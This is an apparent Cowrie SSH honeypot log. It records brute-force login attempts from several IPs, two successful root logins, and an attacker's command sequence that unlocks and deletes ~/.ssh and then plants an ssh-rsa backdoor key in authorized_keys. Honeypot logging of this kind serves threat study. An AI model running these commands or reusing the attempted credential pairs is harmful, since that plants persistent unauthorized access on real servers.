{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:20:55.532542Z","src_ip":"212.227.235.229","session":"2f5bab50a09c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:20:56.553610Z","src_ip":"212.227.235.229","session":"2f5bab50a09c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:20:56.799860Z","src_ip":"212.227.235.229","session":"2f5bab50a09c"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:20:56.800714Z","src_ip":"212.227.235.229","session":"00c7ede8d7ce"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":44706,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfba432840c9","protocol":"ssh","message":"New connection: 167.99.49.89:44706 (1.2.3.4:22) [session: dfba432840c9]","sensor":"my-vps","timestamp":"2025-08-26T13:20:57.477127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:20:57.478130Z","src_ip":"167.99.49.89","session":"dfba432840c9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:20:57.571121Z","src_ip":"167.99.49.89","session":"dfba432840c9"}
{"eventid":"cowrie.login.failed","username":"prueba","password":"1234","message":"login attempt [prueba/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T13:20:57.985538Z","src_ip":"167.99.49.89","session":"dfba432840c9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:20:59.081262Z","src_ip":"167.99.49.89","session":"dfba432840c9"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":54002,"dst_ip":"1.2.3.4","dst_port":22,"session":"95e186f1cd21","protocol":"ssh","message":"New connection: 193.32.162.145:54002 (1.2.3.4:22) [session: 95e186f1cd21]","sensor":"my-vps","timestamp":"2025-08-26T13:21:03.424507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:21:03.425402Z","src_ip":"193.32.162.145","session":"95e186f1cd21"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:21:03.456350Z","src_ip":"193.32.162.145","session":"95e186f1cd21"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-26T13:21:03.556951Z","src_ip":"193.32.162.145","session":"95e186f1cd21"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:21:04.588828Z","src_ip":"193.32.162.145","session":"95e186f1cd21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51705,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c9953b822a3","protocol":"ssh","message":"New connection: 212.227.235.229:51705 (1.2.3.4:22) [session: 7c9953b822a3]","sensor":"my-vps","timestamp":"2025-08-26T13:21:11.011816Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T13:21:11.012738Z","src_ip":"212.227.235.229","session":"7c9953b822a3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T13:21:11.117777Z","src_ip":"212.227.235.229","session":"7c9953b822a3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ronald1","message":"login attempt [admin/ronald1] failed","sensor":"my-vps","timestamp":"2025-08-26T13:21:11.620264Z","src_ip":"212.227.235.229","session":"7c9953b822a3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"rodger","message":"login attempt [admin/rodger] failed","sensor":"my-vps","timestamp":"2025-08-26T13:21:12.727881Z","src_ip":"212.227.235.229","session":"7c9953b822a3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"robyn","message":"login attempt [admin/robyn] failed","sensor":"my-vps","timestamp":"2025-08-26T13:21:13.835600Z","src_ip":"212.227.235.229","session":"7c9953b822a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:21:14.154320Z","src_ip":"176.65.149.186","session":"8fe75779d355"}
{"eventid":"cowrie.session.closed","duration":180.12607264518738,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:21:14.159692Z","src_ip":"176.65.149.186","session":"8fe75779d355"}
{"eventid":"cowrie.login.failed","username":"admin","password":"robson","message":"login attempt [admin/robson] failed","sensor":"my-vps","timestamp":"2025-08-26T13:21:14.943562Z","src_ip":"212.227.235.229","session":"7c9953b822a3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"riptide","message":"login attempt [admin/riptide] failed","sensor":"my-vps","timestamp":"2025-08-26T13:21:16.051255Z","src_ip":"212.227.235.229","session":"7c9953b822a3"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:21:17.158885Z","src_ip":"212.227.235.229","session":"7c9953b822a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10052,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ed49de23fb8","protocol":"ssh","message":"New connection: 212.227.235.229:10052 (1.2.3.4:22) [session: 0ed49de23fb8]","sensor":"my-vps","timestamp":"2025-08-26T13:21:35.691061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T13:21:35.691806Z","src_ip":"212.227.235.229","session":"0ed49de23fb8"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T13:21:35.815654Z","src_ip":"212.227.235.229","session":"0ed49de23fb8"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T13:21:36.410943Z","src_ip":"212.227.235.229","session":"0ed49de23fb8"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:21:37.538075Z","src_ip":"212.227.235.229","session":"0ed49de23fb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49690,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d80aecc1046","protocol":"ssh","message":"New connection: 212.227.235.229:49690 (1.2.3.4:22) [session: 4d80aecc1046]","sensor":"my-vps","timestamp":"2025-08-26T13:21:41.987753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:21:41.988411Z","src_ip":"212.227.235.229","session":"4d80aecc1046"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:21:42.235859Z","src_ip":"212.227.235.229","session":"4d80aecc1046"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer12","message":"login attempt [root/qwer12] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:21:43.267693Z","src_ip":"212.227.235.229","session":"4d80aecc1046"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:21:43.814256Z","src_ip":"212.227.235.229","session":"4d80aecc1046"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:21:43.814781Z","src_ip":"212.227.235.229","session":"4d80aecc1046"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:21:43.815945Z","src_ip":"212.227.235.229","session":"4d80aecc1046"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:21:44.819644Z","src_ip":"212.227.235.229","session":"4d80aecc1046"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:21:45.130881Z","src_ip":"212.227.235.229","session":"4d80aecc1046"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:21:45.131544Z","src_ip":"212.227.235.229","session":"4d80aecc1046"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:21:45.383409Z","src_ip":"212.227.235.229","session":"4d80aecc1046"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:21:45.384334Z","src_ip":"212.227.235.229","session":"4d80aecc1046"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40534,"dst_ip":"1.2.3.4","dst_port":22,"session":"7947925e0163","protocol":"ssh","message":"New connection: 212.227.235.229:40534 (1.2.3.4:22) [session: 7947925e0163]","sensor":"my-vps","timestamp":"2025-08-26T13:21:45.631046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:21:45.631762Z","src_ip":"212.227.235.229","session":"7947925e0163"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:21:45.881379Z","src_ip":"212.227.235.229","session":"7947925e0163"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:21:46.925688Z","src_ip":"212.227.235.229","session":"7947925e0163"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:21:48.178886Z","src_ip":"212.227.235.229","session":"7947925e0163"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40550,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dec8be1d584","protocol":"ssh","message":"New connection: 212.227.235.229:40550 (1.2.3.4:22) [session: 4dec8be1d584]","sensor":"my-vps","timestamp":"2025-08-26T13:21:48.432420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:21:48.433351Z","src_ip":"212.227.235.229","session":"4dec8be1d584"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:21:48.687731Z","src_ip":"212.227.235.229","session":"4dec8be1d584"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:21:49.749112Z","src_ip":"212.227.235.229","session":"4dec8be1d584"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:21:50.005709Z","src_ip":"212.227.235.229","session":"4dec8be1d584"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:21:50.006630Z","src_ip":"212.227.235.229","session":"4d80aecc1046"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:21:56.383440Z","src_ip":"212.227.235.229","session":"ce7174dcae24"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":60464,"dst_ip":"1.2.3.4","dst_port":22,"session":"4741a12c09bb","protocol":"ssh","message":"New connection: 167.99.49.89:60464 (1.2.3.4:22) [session: 4741a12c09bb]","sensor":"my-vps","timestamp":"2025-08-26T13:22:02.818079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:22:02.819238Z","src_ip":"167.99.49.89","session":"4741a12c09bb"}
